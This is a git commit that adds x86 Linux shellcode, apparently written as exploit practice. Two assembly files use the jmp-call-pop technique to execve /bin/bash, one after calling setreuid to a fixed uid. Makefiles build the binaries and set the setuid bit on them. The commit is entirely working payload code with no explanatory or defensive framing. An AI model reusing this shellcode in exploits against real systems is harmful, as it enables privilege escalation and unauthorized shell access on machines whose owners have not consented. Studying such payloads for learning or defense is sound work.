new file: exec_cmd/makefile

new file:   exec_cmd/shell
	new file:   exec_cmd/shell.asm
	new file:   exec_cmd/shell.o
	new file:   exec_cmd_setuid/makefile
	new file:   exec_cmd_setuid/shell
	new file:   exec_cmd_setuid/shell.asm
	new file:   exec_cmd_setuid/shell.o
This commit is contained in:
Brett Weiland 2020-11-20 17:57:20 -06:00
commit 0c7b4ed751
8 changed files with 57 additions and 0 deletions

5
exec_cmd/makefile Normal file
View File

@ -0,0 +1,5 @@
make:
nasm shell.asm -felf32 -o shell.o
ld -m elf_i386 shell.o -o shell -s
chmod u+s shell

BIN
exec_cmd/shell Executable file

Binary file not shown.

19
exec_cmd/shell.asm Normal file
View File

@ -0,0 +1,19 @@
global _start
_start:
jmp short data
exploit:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
mov [edx + 10], eax
mov al, 11
mov ebx, edx
xor edx, edx
int 0x80
data:
call exploit
cmd: db '/bin/bash'

BIN
exec_cmd/shell.o Normal file

Binary file not shown.

5
exec_cmd_setuid/makefile Normal file
View File

@ -0,0 +1,5 @@
make:
nasm shell.asm -felf32 -o shell.o
ld -m elf_i386 shell.o -o shell -s
chmod u+s shell

BIN
exec_cmd_setuid/shell Executable file

Binary file not shown.

28
exec_cmd_setuid/shell.asm Normal file
View File

@ -0,0 +1,28 @@
global _start
_start:
jmp short data
exploit:
xor edx, edx
xor eax, eax ; set reuid
xor ebx, ebx
xor ecx, ecx
mov al, 203
mov bx, 14005
mov cx, 14005
int 0x80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
mov [edx + 10], eax
mov al, 11
mov ebx, cmd
int 0x80
data:
call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
cmd: db '/bin/bash'

BIN
exec_cmd_setuid/shell.o Normal file

Binary file not shown.